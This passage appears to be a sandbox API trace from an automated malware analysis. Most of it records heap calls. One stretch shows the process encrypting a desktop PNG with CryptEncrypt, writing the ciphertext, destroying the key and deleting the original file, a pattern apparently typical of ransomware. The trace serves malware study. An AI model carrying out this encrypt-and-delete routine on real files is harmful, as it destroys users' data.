lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0128.655] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e99c8 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.655] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.656] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0128.656] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797028 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2848 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2bd8 | out: hHeap=0x1780000) returned 1 [0128.656] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0128.656] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.657] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.657] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.657] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.657] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.657] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0x3390, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0x33a0) returned 1 [0128.657] CharLowerBuffW (in: lpsz="byte[13217]", cchLength=0xb | out: lpsz="byte[13217]") returned 0xb [0128.657] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.658] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0128.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cb060, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0128.658] CryptEncrypt (in: hKey=0x41ac280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b3ad8*, pdwDataLen=0x144e790*=0x3390, dwBufLen=0x33a0 | out: pbData=0x49b3ad8*, pdwDataLen=0x144e790*=0x33a0) returned 1 [0128.658] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.659] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.659] WriteFile (in: hFile=0x258, lpBuffer=0x49ad3b8*, nNumberOfBytesToWrite=0x33a0, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x49ad3b8*, lpNumberOfBytesWritten=0x144f194*=0x33a0, lpOverlapped=0x0) returned 1 [0128.660] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0128.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.660] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca9a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0128.660] CryptDestroyKey (hKey=0x41ac280) returned 1 [0128.660] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.660] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0128.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0128.660] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.660] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.661] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.661] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0128.661] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0128.661] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.661] FreeLibrary (hLibModule=0x756e0000) returned 1 [0128.661] CloseHandle (hObject=0x2a0) returned 1 [0128.661] CloseHandle (hObject=0x258) returned 1 [0128.662] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png", lpFilePart=0x0) returned 0x23 [0128.662] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0128.662] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png" (normalized: "c:\\users\\fd1hvy\\desktop\\_uphyhd.png")) returned 0x20 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21c0 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d10 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21f0 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a240 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392688 [0128.663] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392308 [0128.663] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615f6a20, ftCreationTime.dwHighDateTime=0x1d5e38b, ftLastAccessTime.dwLowDateTime=0x59628850, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x59628850, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0x3390, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="_uPhYhD.png", cAlternateFileName="")) returned 0x41ac100 [0128.663] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png" (normalized: "c:\\users\\fd1hvy\\desktop\\_uphyhd.png")) returned 1 [0128.746] FindNextFileW (in: hFindFile=0x41ac100, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615f6a20, ftCreationTime.dwHighDateTime=0x1d5e38b, ftLastAccessTime.dwLowDateTime=0x59628850, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x59628850, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0x3390, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="_uPhYhD.png", cAlternateFileName="")) returned 0 [0128.746] FindClose (in: hFindFile=0x41ac100 | out: hFindFile=0x41ac100) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392308 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2320 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c20 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c38 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0128.747] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0128.747] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cc8 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf7c0 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22c0 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050e78 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22f0 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9890 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b78 | out: hHeap=0x1780000) returned 1 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0128.747] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0128.747] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0128.747] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac440 | out: hHeap=0x1780000) returned 1 [0128.747] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22c0 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0128.748] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0128.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0128.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2240 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf7c0 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21c0 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b78 [0128.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21c0 | out: hHeap=0x1780000) returned 1 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e21c0 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9890 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0128.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2230 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c20 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21d0 [0128.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e60 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ce0 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0128.748] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0128.748] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c98 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e22f0 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21e0 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0128.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0128.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0128.749] PeekMessageW (in: lpMsg=0x144f25c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f25c) returned 0 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0128.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c38 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0128.749] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2130 [0128.749] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2320 [0128.750] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0128.750] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf450 [0128.750] RtlAllocateHeap 